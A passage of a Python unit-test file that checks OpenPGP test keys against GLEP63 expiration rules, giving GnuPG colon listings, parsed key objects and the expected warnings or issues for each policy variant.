keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2021, 8, 1, 22, 0, 2),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 2),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [],
'glep63-1-rsa2048-ec25519': [],
'glep63-1-strict': [],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
}
class PrimaryKeyTwoYearExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/primary-2y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1596319203::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247203::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1564783201:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1564783201:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2020, 8, 1, 22, 0, 3),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 3),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [],
'glep63-1-rsa2048-ec25519': [],
'glep63-1-strict': [],
'glep63-2': [],
'glep63-2-draft-20180707': [],
'glep63-2.1': [],
}
class PrimaryKeyOneWeekExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/primary-1w.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1533852004::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247204::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1564783201:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1564783201:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2018, 8, 9, 22, 0, 4),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 4),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyWarning(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyWarning(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
'glep63-1-strict': [
KeyWarning(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
}
class PrimaryKeyFiveYearExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/primary-5y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1690927205::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247205::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1564783201:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1564783201:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2023, 8, 1, 22, 0, 5),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 5),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyWarning(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyWarning(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-strict': [
KeyWarning(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
}
class PrimaryKeySixYearExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/primary-6y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1722463206::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247206::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1564783201:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1564783201:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2024, 7, 31, 22, 0, 6),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 6),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-strict': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
}
class SubKeyNoExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/subkey-noexpire.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247207::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201::::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201::::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=None,
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=None,
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 7),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:none',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:none',
long_desc='',
),
],
'glep63-1-strict': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:none',
long_desc='',
),
],
'glep63-2': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:none',
long_desc='',
),
],
'glep63-2-draft-20180707': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:none',
long_desc='',
),
],
'glep63-2.1': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:none',
long_desc='',
),
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[1],
machine_desc='expire:none',
long_desc='',
),
],
}
class SubKeySixYearExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/subkey-6y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247207::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1722463208:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1722463208:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2024, 7, 31, 22, 0, 8),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2024, 7, 31, 22, 0, 8),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 7),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-strict': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2-draft-20180707': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2.1': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[1],
machine_desc='expire:long',
long_desc='',
),
],
}
class SubKeyFiveYearExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/subkey-5y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247207::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1690927209:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1690927209:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2023, 8, 1, 22, 0, 9),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2023, 8, 1, 22, 0, 9),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 7),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-strict': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2-draft-20180707': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2.1': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[1],
machine_desc='expire:long',
long_desc='',
),
],
}
class SubKeyTwoYearExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/subkey-2y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247207::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1596319210:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1596319210:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2020, 8, 1, 22, 0, 10),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2020, 8, 1, 22, 0, 10),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 7),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-strict': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2': [],
'glep63-2-draft-20180707': [],
'glep63-2.1': [],
}
class SubKeyOneWeekExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/subkey-1w.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247207::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1533852011:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1533852011:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2018, 8, 9, 22, 0, 11),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2018, 8, 9, 22, 0, 11),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 7),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-1-strict': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2-draft-20180707': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2.1': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[1],
machine_desc='expire:short',
long_desc='',
),
],
}
class TwoSubKeysExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/two-subkeys-1w-1y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247207::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1533852011:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1533852011:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
sub:-:4096:1:88580872B51C08B9:1533247212:1564783212:::::s::::::23:
fpr:::::::::3D36B68F75BA09167B32CF0C88580872B51C08B9:
sub:-:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::e::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2018, 8, 9, 22, 0, 11),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2018, 8, 9, 22, 0, 11),
key_caps='e',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='88580872B51C08B9',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 7),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-1-strict': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2-draft-20180707': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2.1': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[1],
machine_desc='expire:short',
long_desc='',
),
],
}
class PrimaryKeyThreeWeekExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/primary-3w.gpg'
GPG_COLONS = '''
tru::1:1533247200:1564783200:3:1:5
pub:-:4096:1:0C03DAC68D7CAAA4:1533247200:1535061601::u:::cESC::::::23::0:
fpr:::::::::2CBB31F7106077B10497E2180C03DAC68D7CAAA4:
uid:-::::1533247201::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:B600D9C92333A0BD:1533247200:1564783200:::::s::::::23:
